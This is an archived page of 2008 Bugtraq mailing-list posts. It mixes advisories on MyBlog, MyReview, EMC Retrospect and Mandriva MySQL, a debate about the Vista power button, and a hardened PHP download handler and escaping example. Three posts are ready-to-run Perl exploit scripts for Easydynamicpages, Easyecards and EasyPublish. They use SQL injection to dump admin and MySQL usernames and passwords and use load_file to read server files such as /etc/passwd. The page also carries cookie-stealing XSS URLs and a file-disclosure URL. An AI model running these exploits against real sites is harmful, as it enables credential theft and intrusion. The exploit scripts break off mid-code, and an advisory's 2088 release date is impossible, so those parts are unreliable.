> To: [EMAIL PROTECTED]; Jim Harrison; bugtraq@securityfocus.com
> Subject: RE: Windows Vista Power Management & Local Security Policy
>
> If Jim is going to get Nancy to run a program, and that's "not all that
> hard," then why not just have that program do what you want in the first
> place rather than worrying about the power switch nonsense?  This is the
> one million and fourth time:  "If your 'vulnerability' begins with 'if I
> can get the user to run code' then whatever comes after the 'then'
> doesn't matter.  Period."
>
> t
>
>
>
> > -Original Message-
> > From: Abe Getchell [mailto:[EMAIL PROTECTED]
> > Sent: Saturday, July 19, 2008 12:33 AM
> > To: 'Jim Harrison'; bugtraq@securityfocus.com
> > Subject: RE: Windows Vista Power Management & Local Security Policy
> >
> > As stated in my original e-mail to the list, I definitely don't think
> > that this is a security vulnerability in a traditional sense. I
> > completely agree with you. Think about it this way... When you press
> > the power button on the machine and it performs a graceful shutdown,
> > stuff happens inside of the operating system. That stuff happens at an
> > elevated privilege level. If there were some way to hook into the stuff
> > that happens, you (as an unauthenticated user), could do bad things
> > (besides simply shutting down the system) using that hook simply by
> > pressing the power button at the logon screen. For example, if Jim
> > wants to know what Nancy is working on, he could write a program which
> > e-mails him the contents of her "My Documents" folder that is triggered
> > by a hook into that process. All Jim needs to do is get Nancy to run
> > that program on her system (not hard) and walk by her office when she's
> > not there and hit the power button (also not hard). So what can _I_ do
> > with this bug? Not much, I'm not that great of a programmer... but I
> > think someone out there could do some nasty stuff.
> >
> > --
> > Abe Getchell
> > [EMAIL PROTECTED]
> > https://abegetchell.com/
> >
> >
> > > -Original Message-
> > > From: Jim Harrison [mailto:[EMAIL PROTECTED]
> > > Sent: Saturday, July 19, 2008 1:36 AM
> > > To: '[EMAIL PROTECTED]'; bugtraq@securityfocus.com
> > > Subject: RE: Windows Vista Power Management & Local Security Policy
> > >
> > > Abe,
> > >
> > > Other than a denial-of-service from the console (is the power switch
> > > now a security vuln, too?), what can you do with this bug?  It's
> > > absolutely, unquestionably a "bug"; the user should see behavior as
> > > dictated by logic and described in the documentation, but a "security
> > > vulnerability"?
> > >
> > > I think that's stretching things juust a bit.
> > >
> > > Jim
> > >
> > > -Original Message-
> > > From: Abe Getchell [mailto:[EMAIL PROTECTED]
> > > Sent: Thursday, July 17, 2008 7:39 PM
> > > To: bugtraq@securityfocus.com
> > > Subject: Windows Vista Power Management & Local Security Policy
> > >
> > > When the security option "Shutdown: Allow system to be shutdown without
> > > having to log on" (in the local security policy) is set to "Disable", and
> > > the power management setting "When I press the power button" is set to
> > > "Shut Down", it is possible for an unauthenticated user to press the power
> > > button at the Windows logon screen and gracefully shutdown the system. The
> > > explanation of this security option, taken from the local security policy,
> > > is as follows:
> > >
> > > "Shutdown: Allow system to be shut down without having to log on
> > >
> > > This security setting determines whether a computer can be shut down
> > > without having to log

MyBlog <=0.9.8 Multiple Vulnerabilities

2008-07-21 Thread admin
## www.BugReport.ir  
###

#
#   AmnPardaz Security Research Team
#
# Title: MyBlog <=0.9.8 Multiple Vulnerabilities
# Vendor: http://crewdesign.co.uk & http://sourceforge.net/projects/myblog
# Exploit: Available
# Vulnerable Version: 0.9.8
# Impact: High
# Fix: N/A
# Original Advisory: www.bugreport.ir/?/49
###


1. Description:

	MyBlog(CMS) is an open source Blog/CMS project. MyBlog(CMS) was  
created as an expandable and easy to use system to manage your website  
with. Its best feature is its customisability, you could use it to run  
your whole site around with forum modules, photo gallery modules and  
all that jazz or you could just run a simple add-on blog using it.


2. Vulnerabilities:

    2.1. Information Leakage. Database information disclosure in
"/config/mysqlconnection.inc" and/or
"/config/mysqlconnection%20-%20Copy.inc" or "/admin/setup.php".

    2.1.1. Exploit:
    Check the exploit/POC section.

    2.2. Cross Site Scripting (XSS). Reflected XSS attack in "index.php"
in "sort" and "s" parameters.

    2.2.1. Exploit:
    Check the exploit/POC section.

    2.3. Cross Site Scripting (XSS). Reflected XSS attack in "post.php"
in "id" parameter.

    2.3.1. Exploit:
    Check the exploit/POC section.

    2.4. Information Leakage. Source code disclosure in
"/config/settings.inc".

    2.4.1. Exploit:
    Check the exploit/POC section.

3. Exploits/POCs:

Original Exploit URL: http://bugreport.ir/index.php?/49/exploit

4. Solution:

	Edit the source code to ensure that inputs are properly sanitized.  
Rename the mentioned files in section 2.1, 2.4 and wait for vendor  
patch.


5. Credit:

AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com



RE: Windows Vista Power Management & Local Security Policy

2008-07-21 Thread Abe Getchell
So, you guys don't think it's an issue that power management in Vista
(apparently) has a pass to bypass local security policy?

--
Abe Getchell
[EMAIL PROTECTED]
https://abegetchell.com/

> -Original Message-
> From: Thor (Hammer of God) [mailto:[EMAIL PROTECTED]
> Sent: Saturday, July 19, 2008 6:20 PM
> To: [EMAIL PROTECTED]; Jim Harrison; bugtraq@securityfocus.com
> Subject: RE: Windows Vista Power Management & Local Security Policy
> 
> If Jim is going to get Nancy to run a program, and that's "not all that
> hard," then why not just have that program do what you want in the
> first place rather than worrying about the power switch nonsense?  This
> is the one million and fourth time:  "If your 'vulnerability' begins
> with 'if I can get the user to run code' then whatever comes after the
> 'then' doesn't matter.  Period."
> 
> t
> 
> 
> 
> > -Original Message-
> > From: Abe Getchell [mailto:[EMAIL PROTECTED]
> > Sent: Saturday, July 19, 2008 12:33 AM
> > To: 'Jim Harrison'; bugtraq@securityfocus.com
> > Subject: RE: Windows Vista Power Management & Local Security Policy
> >
> > As stated in my original e-mail to the list, I definitely don't think
> > that this is a security vulnerability in a traditional sense. I
> > completely agree with you. Think about it this way... When you press
> > the power button on the machine and it performs a graceful shutdown,
> > stuff happens inside of the operating system. That stuff happens at an
> > elevated privilege level. If there were some way to hook into the
> > stuff that happens, you (as an unauthenticated user), could do bad
> > things (besides simply shutting down the system) using that hook
> > simply by pressing the power button at the logon screen. For example,
> > if Jim wants to know what Nancy is working on, he could write a
> > program which e-mails him the contents of her "My Documents" folder
> > that is triggered by a hook into that process. All Jim needs to do is
> > get Nancy to run that program on her system (not hard) and walk by her
> > office when she's not there and hit the power button (also not hard).
> > So what can _I_ do with this bug? Not much, I'm not that great of a
> > programmer... but I think someone out there could do some nasty stuff.
> >
> > --
> > Abe Getchell
> > [EMAIL PROTECTED]
> > https://abegetchell.com/
> >
> >
> > > -Original Message-
> > > From: Jim Harrison [mailto:[EMAIL PROTECTED]
> > > Sent: Saturday, July 19, 2008 1:36 AM
> > > To: '[EMAIL PROTECTED]'; bugtraq@securityfocus.com
> > > Subject: RE: Windows Vista Power Management & Local Security Policy
> > >
> > > Abe,
> > >
> > > Other than a denial-of-service from the console (is the power
> > > switch now a security vuln, too?), what can you do with this bug?
> > > It's absolutely, unquestionably a "bug"; the user should see
> > > behavior as dictated by logic and described in the documentation,
> > > but a "security vulnerability"?
> > >
> > > I think that's stretching things juust a bit.
> > >
> > > Jim
> > >
> > > -Original Message-
> > > From: Abe Getchell [mailto:[EMAIL PROTECTED]
> > > Sent: Thursday, July 17, 2008 7:39 PM
> > > To: bugtraq@securityfocus.com
> > > Subject: Windows Vista Power Management & Local Security Policy
> > >
> > > When the security option "Shutdown: Allow system to be shutdown
> > > without having to log on" (in the local security policy) is set to
> > > "Disable", and the power management setting "When I press the power
> > > button" is set to "Shut Down", it is possible for an unauthenticated
> > > user to press the power button at the Windows logon screen and
> > > gracefully shutdown the system. The explanation of this security
> > > option, taken from the local security policy, is as follows:
> > >
> > > "Shutdown: Allow system to be shut down without having to log on
> > >
> > > This security setting determines whether a computer can be shut
> > > down without having to log on to Windows.
> > >
> > > When this policy is enabled, the Shut Down command is available on
> > > the Windows logon screen.
> > >
> > > When this policy is disabled, the option to shut down the computer
> > > does not appear on the Windows logon screen. In this case, *users
> > > must be able to log on to the computer successfully and have the
> > > Shut down the system user right before they can perform a system
> > > shutdown*.
> > >
> > > Default on workstations: Enabled.
> > > Default on servers: Disabled."
> > >
> > > Note the text between the asterisks. While this bug isn't
> > > necessarily a software flaw allowing for an intrusion into the
> > > system in a traditional sense, it does set a bad precedence in that
> > > power management has a free pass to bypass local security policy and
> > > perform actions expressly against the defined policy. It app

EZWebAlbum (dlfilename) Remote File Disclosure Vulnerability

2008-07-21 Thread Ghost hacker


##
 EZWebAlbum (dlfilename) Remote File Disclosure Vulnerability
 Found by : Ghost Hacker [ R-H TeaM ]
 My Site web : Real-hack.Net
##
[~] Found by : Ghost Hacker [ R-H TeaM ]
[~] Home page : www.Real-hack.net
[~] Email : [EMAIL PROTECTED]
[~] Name Script : EZWebAlbum
[~] Download Script : http://sourceforge.net/projects/ezwebalbum
## [ Viva IslaM & KSA ] 
##
[~] Error (download.php) :
readfile($dlfilename);

[~] Exploit :
http:///[path]/download.php?dlfilename=EVIL
[~] Example :
http:///[path]/download.php?dlfilename=index.php
## [ Viva IslaM & KSA ] 
##
[~] Greetz :
PROTO & QaTaR BoeZ TeaM & Aseg-Rabe7 & Dmar al3noOoz & 4Bo3tB & LeGeNd HaCkEr & 
Root Hacker ..
Qptan & ScarY.HaCkEr & EgYpTiaNxHaCkEr the-pirate.org & Mr.hope & My Blog[ 
gh0st10.wordpress.com ]
All Members Real Hack And All My Friends ..
##
 Found by : Ghost Hacker [ R-H TeaM ]
##
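The bare readfile($dlfilename) quoted above hands an attacker-chosen path straight to the file system. As an added example (not EZWebAlbum's code), here is a hardened replacement for the download handler; the album directory, the list of allowed extensions and the helper name resolve_album_file are assumptions.

```php
<?php
// Added example, not EZWebAlbum's code: a hardened replacement for the
// download.php pattern `readfile($dlfilename)` quoted in the advisory.
// Assumptions (hypothetical): album files live under ALBUM_DIR and only
// image files with the listed extensions may ever be served.

const ALBUM_DIR   = '/var/www/ezwebalbum/albums';   // assumed location
const ALLOWED_EXT = ['jpg', 'jpeg', 'png', 'gif'];  // assumed allow-list

/**
 * Resolve a user-supplied file name to a canonical path inside $baseDir.
 * Returns null whenever the request must be refused.
 */
function resolve_album_file(string $requested, string $baseDir): ?string
{
    // A legitimate request is a bare file name: no NUL bytes, no
    // directory components, and not the '.' or '..' pseudo-entries.
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    if ($requested === '.' || $requested === '..'
        || basename($requested) !== $requested) {
        return null; // contained a path separator
    }

    // Extension allow-list blocks index.php, *.inc and the like even
    // when they sit inside the album directory.
    $ext = strtolower(pathinfo($requested, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }

    // Canonicalise both sides and require containment, so a symlink
    // placed in the album directory cannot point outside it either.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $path === false) {
        return null; // base directory missing or file does not exist
    }
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return is_file($path) ? $path : null;
}

// Request handling that replaces the bare readfile($dlfilename).
$requested = (string)($_GET['dlfilename'] ?? '');
$path = resolve_album_file($requested, ALBUM_DIR);
if ($path === null) {
    // Same response for "outside the album" and "no such file": the
    // client learns nothing about what exists elsewhere on disk.
    http_response_code(404);
    exit('Not found');
}

header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($path) . '"');
header('Content-Length: ' . (string)filesize($path));
readfile($path);
```

With this in place the advisory's request for dlfilename=index.php is refused at the extension check, and any value carrying a slash is refused before the file system is touched.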

Easydynamicpages 30tr Multiple Vulnerabilities ( Xss / Sql Injection Exploit / File Disclosure Exploit )

2008-07-21 Thread irancrash
#!/usr/bin/perl
#
#
#Script : Easydynamicpages 30tr
#
#Type : Multiple Vulnerabilities ( Xss / Sql Injection Exploit / File Disclosure Exploit )
#
#Variable Method : GET
#
#Alert : High
#
#
#
#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash
#
#My Official Website : HTTP://FEREIDANI.IR
#
#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
#
#
#
#Khashayar Fereidani Official Website : HTTP://FEREIDANI.IR
#
#
#
#Script Download : http://myiosoft.com/download/EasyDynamicPages/easydynamicpages-30tr.zip
#
#
#
#Xss 1 : http://Example/staticpages/easycalendar/index.php?PageSection=1&month=4&year=alert(document.cookie);
#
#
#
#SQL Injection :
#
#SQL 1 : http://Example/dynamicpages/index.php?page=individual&table=edp_Help_Internal_News&read=1+union/**/select/**/0,1,2,3,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),5,6/**/from/**/edp_puusers/*
#
#
#
#
#Tnx : God
#
# HTTP://IRCRASH.COM
#
#


use LWP;
use HTTP::Request;
use Getopt::Long;
 
 


sub header
{
print "

* Easydynamicpages 30tr Exploit*

*Discovered by : Khashayar Fereidani   *
*Exploited by : Khashayar Fereidani*
*My Official Website : http://fereidani.ir *
";
}
 
sub usage
{
  print "
* Usage : perl $0 http://Example/

";
}   
   
 

$url = ($ARGV[0]);

if(!$url)
{
header();
usage();
exit;
}
if($url !~ /\//){$url = $url."/";}
if($url !~ /http:\/\//){$url = "http://".$url;}
sub xpl1()
{
$vul = 
"/dynamicpages/index.php?page=individual&table=edp_Help_Internal_News&read=1+union/**/select/**/0,1,2,3,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),5,6/**/from/**/edp_puusers/*";
$requestpage = $url.$vul;

 
my $req  = HTTP::Request->new("POST",$requestpage);
$ua = LWP::UserAgent->new;
$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req->referer($url);
$req->referer("IRCRASH.COM");
$req->content_type('application/x-www-form-urlencoded');
$req->header("content-length" => $contlen);
$req->content($poststring);
 
$response = $ua->request($req);
$content = $response->content;
$header = $response->headers_as_string();
 
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(//,$name);
$name = @name[0];
 
@password = split(/Password:/,$content);
$password = @password[1];
@password = split(//,$password);
$password = @password[0];

if(!$name && !$password)
{
print "\n\n";
print "!Exploit failed ! :(\n\n";
exit;
}
 
print "\n Username: ".$name."\n\n";
print " Password: " .$password."\n\n";

 
}
 

#XPL2

sub xpl2()
{
print "\n Example For File Address : /home/user/public_html/config.php\n Or 
/etc/passwd";
print "\n Enter File Address :";
$fil3 = ;

$vul = 
"/dynamicpages/index.php?page=individual&table=edp_Help_Internal_News&read=1+union/**/select/**/0,1,2,3,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),5,6/**/from/**/edp_puusers/*";
$requestpage = $url.$vul;
 
my $req  = HTTP::Request->new("POST",$requestpage);
$ua = LWP::UserAgent->new;
$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req->referer($url);
$req->referer("IRCRASH.COM");
$req->content_type('application/x-www-form-urlencoded');
$req->header("content-length" => $contlen);
$req->content($poststring);
 
$response = $ua->request($req);
$content = $response->content;
$header = $response->headers_as_string();

 
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(//,$name);
$name = @name[0];


if(!$name && !$password)
{
print "\n\n";
print "!Exploit failed ! :(\n\n";
exit;
}
 
open (FILE, ">".source.".txt");
print FILE $name;
close (FILE);
print " File Save In source.txt\n";
print "";
 
}

#XPL2 END
#Starting;
print "

* Easydynamicpages 30tr Exploit*

*Discovered by : Khashayar Fereidani   *
*Exploited by : Khashayar Fereidani*
*My Official Website : http://fereidani.ir *

* Mod Options : 

Vulnerability CVE-2008-3671 - MyReview's vulnerability in the access control system

2008-07-21 Thread Julien Thomas
Incorrect management of the submission and camera ready versions of
submitted papers to the MyReview system lets unintended users download
these documents. This information leakage can be used to illegally
retrieve sensitive or licensed documents.

I. Description
The MyReview web application is an open-source web application used in
the research community to manage the paper submission and paper review
phases of conferences. Based on the well known PHP+MySQL framework and
distributed under the GNU General Public License, it has been used by
thousands of conferences worldwide.
Incorrect management of the submission and camera ready versions of
submitted papers to the MyReview system lets unintended users download
these documents. This flaw bypasses all the access controls implemented
by the MyReview developers. This information leakage is critical as
the documents submitted to the conferences, and mostly at the
submission phase, contain sensitive information researchers may not
want to be publicized.
Besides, this flaw can be used by attackers to retrieve at will the
final version of the documents, after the conference is done.
However, these final versions may not be free, as is often the case
for conferences.
More information about this flaw will be publicized later on, as it
could be used to attack existing deployments of the MyReview system.

II. Impact
Exploitation of this vulnerability could lead to the loss of the
sensitive information managed by MyReview: submission and camera ready
versions of the submitted papers may be downloaded.

III. Solution
The Laboratoire de Recherche en Informatique (LRI), which provides
MyReview, has been contacted and has received a patch I made for this
vulnerability. However, to avoid attacks on unpatched websites (which are
very easy to do), the author decided to let the LRI make the
decision about how to efficiently perform the update. Please see
your vendor's advisory for updates and mitigation capabilities. A good
point would be to subscribe to the MyReview newsletter, if not done yet.

Version and platform Affected
Affected Platforms - Any
Affected Software - MyReview, http://myreview.intellagence.eu/
Affected Versions - Any (prior or equal to 1.9.9, as 2.0 is still in beta)
Severity - High

Requirements
Authentication - None
Access - Distant (Internet)

References


Credit
This vulnerability was reported by Julien A. Thomas.
Contact : [EMAIL PROTECTED]
TELECOM Bretagne homepage: http://perso.telecom-bretagne.eu/julienthomas/
Personal homepage: http://www.julienthomas.eu/

Other Information
Date Discovered - 16/07/2008
Date Public - 18/07/2008
Date First Published - 18/07/2008
Date Last Updated - 18/07/2008
CVE Name (candidate) - CVE-2008-3671

PS: sorry if this message was sent twice but I got some mailer-daemon
rejects ...

Julien


FGA-2008-16: EMC Dantz Retrospect 7 backup Client 7.5.116 Remote Memory corruption Vulnerability

2008-07-21 Thread zhliu
FGA-2008-16: EMC Dantz Retrospect 7 backup Client 7.5.116 Remote Memory
corruption Vulnerability
http://www.fortiguardcenter.com/advisory/FGA-2008-16.html
July 20, 2008

-- Affected Vendors:
EMC

-- Affected Products:
EMC Dantz Retrospect 7 backup Client 7.5.116

-- Vulnerability Details:

The retroclient.exe process listens, in a default configuration, on TCP
port 497.
When packets with a length of 2064 bytes, filled with 0x00, are sent
continuously, after about 30 seconds to 5 minutes the status box shows:
"Client networking not available, or service not running". Keeping on
sending packets, a few times later the retroclient.exe process
terminates, the backup service is lost and TCP port 497 is closed.


-- Vendor Response:
EMC has issued an update to correct this vulnerability:

http://www.emcinsignia.com/updates

-- Disclosure Timeline:
2008-04-20 - Vulnerability reported to vendor
2008-06-30 - Vendor issued update
2088-07-20 - Coordinated public release of advisory

Acknowledgment:

Zhenhua Liu of Fortinet's FortiGuard Global Security Research Team


Disclaimer:

Although Fortinet has attempted to provide accurate information in these
materials, Fortinet assumes no legal responsibility for the accuracy or
completeness of the information. More specific information is available on
request from Fortinet. Please note that Fortinet's product information
does not constitute or contain any guarantee, warranty or legally binding
representation, unless expressly identified as such in a duly signed
writing.

About Fortinet ( www.fortinet.com ):

Fortinet is the pioneer and leading provider of ASIC-accelerated unified
threat management, or UTM, security systems, which are used by enterprises
and service providers to increase their security while reducing total
operating costs. Fortinet solutions were built from the ground up to
integrate multiple levels of security protection--including firewall,
antivirus, intrusion prevention, VPN, spyware prevention and anti-spam --
designed to help customers protect against network and content level
threats. Leveraging a custom ASIC and unified interface, Fortinet
solutions offer advanced security functionality that scales from remote
office to chassis-based solutions with integrated management and
reporting. Fortinet solutions have won multiple awards around the world
and are the only security products that are certified in six programs by
ICSA Labs: (Firewall, Antivirus, IPSec, SSL, Network IPS, and
Anti-Spyware). Fortinet is privately held and based in Sunnyvale,
California.



EMC Dantz Retrospect 7 backup Client PlainText Password Hash Disclosure Vulnerability

2008-07-21 Thread zhliu
FGA-2008-16: EMC Dantz Retrospect 7 backup Client PlainText Password Hash
Disclosure Vulnerability
http://www.fortiguardcenter.com/advisory/FGA-2008-16.html
July 20, 2008

-- Affected Vendors:
EMC

-- Affected Products:
EMC Dantz Retrospect 7 backup Client 7.5.116

-- Vulnerability Details:

The password hash of the EMC Dantz Retrospect 7 backup Client is
transferred over the network in plaintext.
By sending a malicious packet to the client, the client will send back
lots of information including the password hash, resulting in a loss of
confidentiality.

What is more, the EMC Dantz Retrospect 7 backup server's authentication
module uses weak password hash arithmetic; by brute-forcing it an
attacker can gain full control of the client's machine.


-- Vendor Response:
EMC has issued an update to correct this vulnerability:

http://www.emcinsignia.com/updates

-- Disclosure Timeline:
2008-04-20 - Vulnerability reported to vendor
2008-06-30 - Vendor issued update
2088-07-20 - Coordinated public release of advisory

Acknowledgment:

Zhenhua Liu of Fortinet's FortiGuard Global Security Research Team






Maran PHP Blog Xss By Khashayar Fereidani

2008-07-21 Thread irancrash



Script : Maran PHP Blog

Type : XSS (Passive)

Method : GET

Alert : Medium

Discovered by : Khashayar Fereidani a.k.a. Dr.Crash

My Official Website : HTTP://FEREIDANI.IR

Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com

Khashayar Fereidani Official Website : HTTP://FEREIDANI.IR

Script Download :
http://www.maran.pamil-visions.com/download2.php?dir=maranphp&file=maranblog.zip

This Is One Xss Vulnerability in ID Variable .

Attacker Can Execute JavaScript Code And Get Admin Cookie And Send new article
with admin cookie .

Xss Address :
http://Example/comments.php?id=%3E%3C%3E%27%3Cscript%3Ealert(document.cookie)%3C/script%3E

Solution : Edit Source Code And Filter id Variable With htmlspecialchars()
function in comments.php ...

line 32 : '>

Change It To : '>

Tnx : God

 HTTP://IRCRASH.COM
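The payload above places a single quote (%27) in front of the script tag, and the quoted line 32 fragment ('>) suggests the id is echoed inside a single-quoted attribute. As an added example that is not Maran PHP Blog's code, this shows why htmlspecialchars() needs ENT_QUOTES in that context, and adds an input check that rejects the value before it reaches HTML at all; the render_* and validate_id functions and the attribute context are assumptions.

```php
<?php
// Added example, not Maran PHP Blog's code. The attribute context below
// is an assumption drawn from the advisory's quoted "'>" fragment.
// Plain htmlspecialchars() (before PHP 8.1) leaves ' untouched, so the
// flags must match the context the value is rendered into.

/** Unsafe rendering as the advisory describes: id is echoed verbatim. */
function render_link_unsafe(string $id): string
{
    return "<a href='comments.php?id=" . $id . "'>comments</a>";
}

/** Escaped for a single-quoted attribute: ENT_QUOTES also encodes '. */
function render_link_safe(string $id): string
{
    $safe = htmlspecialchars($id, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<a href='comments.php?id=" . $safe . "'>comments</a>";
}

/** Only digit strings are valid ids here; reject anything else early. */
function validate_id(string $id): ?int
{
    return ctype_digit($id) ? (int)$id : null;
}

// Decoded form of the payload from the advisory (constructed test input).
$payload = "><>'<script>alert(document.cookie)</script>";

echo render_link_unsafe($payload), "\n";
// The ' closes href and the rest is parsed as markup: the script runs.

echo render_link_safe($payload), "\n";
// <, > and ' are now entities; the browser shows text, not a tag.

var_dump(validate_id($payload)); // NULL: refused before any HTML is built
var_dump(validate_id('42'));     // int(42)
```

Escaping is the output-side fix the advisory asks for; the numeric check is the input-side one, and a comments page that takes a numeric id should apply both.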





[ MDVSA-2008:150 ] - Updated mysql packages fix vulnerabilities

2008-07-21 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDVSA-2008:150
 http://www.mandriva.com/security/
 ___
 
 Package : mysql
 Date: July 19, 2008
 Affected: 2007.1, 2008.0, Corporate 4.0
 ___
 
 Problem Description:
 
 Multiple buffer overflows in yaSSL, which is used in MySQL, allowed
 remote attackers to execute arbitrary code (CVE-2008-0226) or cause
 a denial of service via a special Hello packet (CVE-2008-0227).
 
 Sergei Golubchik found that MySQL did not properly validate optional
 data or index directory paths given in a CREATE TABLE statement; as
 well it would not, under certain conditions, prevent two databases
 from using the same paths for data or index files.  This could allow
 an authenticated user with appropriate privilege to create tables in
 one database to read and manipulate data in tables later created in
 other databases, regardless of GRANT privileges (CVE-2008-2079).
 
 The updated packages have been patched to correct these issues.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0226
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0227
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2079
 ___
 
 Updated Packages:
 

Easyecards 310a Multiple Vulnerabilities ( Xss / Sql Injection Exploit / File Disclosure Exploit ) By Khashayar Fereidani

2008-07-21 Thread irancrash
#!/usr/bin/perl
#
#
#Script : Easyecards 310a
#
#Type : Multiple Vulnerabilities ( Xss / Sql Injection Exploit / File Disclosure Exploit )
#
#Variable Method : GET
#
#Alert : High
#
#
#
#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash
#
#My Official Website : HTTP://FEREIDANI.IR
#
#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
#
#
#
#Khashayar Fereidani Official Website : HTTP://FEREIDANI.IR
#
#
#
#Script Download : http://myiosoft.com/download/EasyE-Cards/easyecards-310a.zip
#
#
#Xss 1 : http://Example/?ResultHtml=alert('xss') 
#
#Xss 2 : http://Example/index.php?step=2&dir=<''"alert('xss')
#
#Xss 3 : http://Example/index.php?step=2&SenderName=<''"alert('xss')
#
#Xss 4 : http://Example/index.php?step=2&RecipientName=%3C%3E%3E%3E%3E%27%27%22%3Cscript%3Ealert(%27xss%27)%3C/script%3E
#
#Xss 5 : http://Example/index.php?step=2&SenderMail=<''"alert('xss')
#
#Xss 6 : http://Example/index.php?step=2&RecipientMail=%3C%3E%3E%3E%3E%27%27%22%3Cscript%3Ealert(%27xss%27)%3C/script%3E
#
#
#
#SQL Injection :
#
#SQL 1 : http://Example/index.php?show=pickup&sid=9'+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13/*
#
#
#
#
#Tnx : God
#
# HTTP://IRCRASH.COM
#
#


use LWP;
use HTTP::Request;
use Getopt::Long;
 
 


sub header
{
print "

*Easyecards 310a Exploit   *

*Discovered by : Khashayar Fereidani   *
*Exploited by : Khashayar Fereidani*
*My Official Website : http://fereidani.ir *
";
}
 
sub usage
{
  print "
* Usage : perl $0 http://Example/

";
}   
   
 

$url = ($ARGV[0]);

if(!$url)
{
header();
usage();
exit;
}
if($url !~ /\//){$url = $url."/";}
if($url !~ /http:\/\//){$url = "http://".$url;}
sub xpl1()
{
$vul = 
"?show=pickup&sid=9'+union+select+0,concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),2,3,4,5,6,7,8,9,10,11,12,13+from+mysql.user/*";
$requestpage = $url.$vul;

 
my $req  = HTTP::Request->new("POST",$requestpage);
$ua = LWP::UserAgent->new;
$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req->referer($url);
$req->referer("IRCRASH.COM");
$req->content_type('application/x-www-form-urlencoded');
$req->header("content-length" => $contlen);
$req->content($poststring);
 
$response = $ua->request($req);
$content = $response->content;
$header = $response->headers_as_string();
 
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(//,$name);
$name = @name[0];
 
@password = split(/Password:/,$content);
$password = @password[1];
@password = split(//,$password);
$password = @password[0];

if(!$name && !$password)
{
print "\n\n";
print "!Exploit failed ! :(\n\n";
exit;
}
 
print "\n Username: ".$name."\n\n";
print " Password: " .$password."\n\n";

 
}
 

#XPL2

sub xpl2()
{
print "\n Example For File Address : /home/user/public_html/config.php\n Or 
/etc/passwd";
print "\n Enter File Address :";
$fil3 = ;

$vul = 
"?show=pickup&sid=9'+union+select+0,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),2,3,4,5,6,7,8,9,10,11,12,13+from+mysql.user/*";
$requestpage = $url.$vul;
 
my $req  = HTTP::Request->new("POST",$requestpage);
$ua = LWP::UserAgent->new;
$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req->referer($url);
$req->referer("IRCRASH.COM");
$req->content_type('application/x-www-form-urlencoded');
$req->header("content-length" => $contlen);
$req->content($poststring);
 
$response = $ua->request($req);
$content = $response->content;
$header = $response->headers_as_string();

 
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(//,$name);
$name = @name[0];


if(!$name && !$password)
{
print "\n\n";
print "!Exploit failed ! :(\n\n";
exit;
}
 
open (FILE, ">".source.".txt");
print FILE $name;
close (FILE);
print " File Save In source.txt\n";
print "";
 
}

#XPL2 END
#Starting;
print "

*Easyecards 310a Exploit   *

*Discovered by : Khashayar Fereidani   *
*Exploited by : Khashayar Fereidani*
*My Official Website : 

EasyPublish 3.0tr Multiple Vulnerabilities ( Xss / Sql Injection Exploit / File Disclosure Exploit )

2008-07-21 Thread irancrash
#!/usr/bin/perl
#
#
#Script : EasyPublish 3.0tr
#
#Type : Multiple Vulnerabilities ( Xss / Sql Injection Exploit / File Disclosure Exploit )
#
#Variable Method : GET
#
#Alert : High
#
#
#
#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash
#
#My Official Website : HTTP://FEREIDANI.IR
#
#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
#
#
#
#Khashayar Fereidani Official Website : HTTP://FEREIDANI.IR
#
#
#
#Script Download : http://myiosoft.com/download/EasyPublish/easypublish-30tr.zip
#
#
#
#Xss 1 : http://Example//staticpages/easypublish/index.php?PageSection=0&page=individual&table=edp_News&read=%alert(document.cookie);
#
#
#
#SQL Injection :
#
#SQL 1 : http://Example/staticpages/easypublish/index.php?PageSection=0&table=edp_News&page=individual&fage=search&read=1+union+all+select+1,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),3,4,1,5+FROM+edp_puusers/*;--
#
#
#
#
#Tnx : God
#
# HTTP://IRCRASH.COM
#
#


use LWP;
use HTTP::Request;
use Getopt::Long;
 
 


sub header
{
print "

*   EasyPublish 3.0tr Exploit  *

*Discovered by : Khashayar Fereidani   *
*Exploited by : Khashayar Fereidani*
*My Official Website : http://fereidani.ir *
";
}
 
sub usage
{
  print "
